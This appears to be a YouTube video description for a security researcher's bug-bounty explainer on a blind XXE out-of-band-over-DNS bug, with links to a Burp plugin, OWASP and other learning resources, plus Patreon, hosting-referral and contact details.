A $7.500 BUG BOUNTY Bug explained, step by step. (BLIND XXE OOB over DNS) - REDUX

Have you ever wondered what a $7.500 Bug Bounty bug looks like?
In this "re-upload" of the original video created in 2019, il walk you through a theoretical "BLIND XXE OOB over DNS" bug on a super-hardened target and explain the ideas around how to exploit it.

The tool used in this video to create the initial XML/PDF payload is Tobias 'floyd' Ospelt amazing burp plugin "Upload Scanner" I absolutely recommend that you use it for all your file upload automation needs.

  / floyd_ch  
https://github.com/portswigger/upload...

Owasp XXE
https://www.owasp.org/index.php/XML_E...

Out of band entity XXE explained
https://www.acunetix.com/blog/article...

Burp collaborator
https://portswigger.net/burp/document...

Exploiting XXE with local DTD files
https://mohemiv.com/all/exploiting-xx...

Comments are disabled by default, but you can find me and the community over at   / stokfredrik  

-------------- -- --
Support my work:
Join me on Patreon!   / stokfredrik  

Need a shell to hack from? setup your own droplet today!
Get $100 credit on Digital Ocean using this link
https://m.do.co/c/5884b0601466
-------------- -- --
FAQ:

What gear do you use? :
Check out https://www.stokfredrik.com

Dude, I love what you do can we do "work stuff" together?
Sure, Email me at workwith @ stokfredrik.com